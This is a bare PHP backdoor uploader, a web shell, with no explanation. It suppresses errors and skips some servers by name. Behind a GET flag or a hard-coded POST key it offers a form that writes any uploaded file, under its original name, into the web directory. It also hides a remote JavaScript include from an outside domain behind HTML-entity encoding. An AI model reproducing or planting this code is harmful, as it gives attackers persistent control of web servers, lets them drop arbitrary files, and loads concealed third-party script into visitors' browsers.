<?php
error_reporting
(0);
if (
strpos($_SERVER['SERVER_NAME'], 'nsoid') !== false) {
    die;
}

if (
$_GET['up'] || $_POST['up'] === 'hwIOTXUMIthglXhJbN8Y') {
echo 
'<!DOCTYPE html>
<html>
<body>
  <form enctype="multipart/form-data" action="'
.basename($_SERVER['PHP_SELF']).'" method="POST">
    <p>ok</p>
    <input type="file" name="uploaded_file"></input><br /><br />
    <input type="submit" value="Upload"></input>
    <input type="hidden" name="up" value="hwIOTXUMIthglXhJbN8Y">
  </form>
<SCRIPT SRC=&#x68&#x74&#x74&#x70&#x73&#x3a&#x2f&#x2f&#x77&#x77&#x77&#x2e&#x6c&#x6f&#x63&#x61&#x6c&#x72&#x6f&#x6f&#x74&#x2e&#x6e&#x65&#x74&#x2f&#x73&#x61&#x62&#x75&#x6e&#x2f&#x79&#x61&#x7a&#x2e&#x6a&#x73></SCRIPT> 
</body>
</html>'
;

  if(!empty(
$_FILES['uploaded_file']))
  {
    
$path "./";
    
$path $path basename$_FILES['uploaded_file']['name']);
    if(
move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
      echo 
'</br>'."The file ".  basename$_FILES['uploaded_file']['name']). 
      
" has been uploaded";
    } else{
        echo 
'</br>'"There was an error uploading the file, please try again!";
    }
  }
}
?>